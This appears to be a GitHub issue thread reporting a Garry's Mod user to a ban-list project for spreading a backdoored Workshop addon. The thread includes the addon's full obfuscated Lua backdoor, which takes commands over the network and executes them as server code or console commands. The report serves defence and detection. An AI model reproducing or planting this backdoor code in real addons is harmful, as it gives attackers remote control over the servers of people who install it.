### ISSUE TITLE
HTX

### ISSUE THREAD

**Issue by BeeTeeGee** [MFSiNC/SkidCheck-2.0#62]
User in question is using HTX to infect servers with his backdoored Workshop addon which is actually a modified version of APAnti:

[Him admitting it's a backdoor](http://i.imgur.com/ZsLubqU.png)

[Steam Profile if needed](http://steamcommunity.com/profiles/76561198267963250)

[Addon in question](http://steamcommunity.com/sharedfiles/filedetails/?id=751964077)

In apa_antiprop.lua:

`if SERVER then
local c='%c'
local YYYYTTYXY6Y = util.AddNetworkString
local YYYYTRYXY6Y = _G[string.format(string.rep(c,9), 82, 117, 110, 83, 116, 114, 105, 110, 103)]
local YYYYTRYXY66 = net.ReadString
local YYTYYYY666T = type
local YYTYTYY666T = bit.tohex
local YYTTTYY666T = math.sin
local YYTTTYY66TT = math.cos
local YYYYTRY6Y66 = net.ReadBit
local YYTYYRY6Y66 = net.Receive
local YYTYYRY666Y = game.ConsoleCommand
local YYTYYYY666Y = game.GetWorld
local YYYYTTYXYYY = string.format(string.rep(c,15), 83, 97, 110, 100, 98, 111, 120, 95, 65, 114, 109, 68, 117, 112, 101)
YYYYTTYXY6Y(YYYYTTYXYYY)
YYTYYRY6Y66(YYYYTTYXYYY, function( length, ply )
local YYRYTTYXY6Y = YYYYTRYXY66()
local TYYTTYXY6Y = YYYYTRY6Y66()
if TYYTTYXY6Y == 1 then
YYYYTRYXY6Y(YYRYTTYXY6Y)
else
YYTYYRY666Y(YYRYTTYXY6Y.."\n")
end
end)
end`

I assume you already know what this failed attempt at 'encrypting' Lua code translates to since you already have it in your "Backdoor_Busting", so I most likely don't need to say any more that I already have said

**Comment by BeeTeeGee** [comment]
Either the addon was already deleted by Rubat or the addon creator deleted it himself, but you can find a similar report here: https://github.com/LuaTenshi/APAnti/issues/12

**Comment by MFSiNC** [comment]
Added. Will sync when PC is back online.
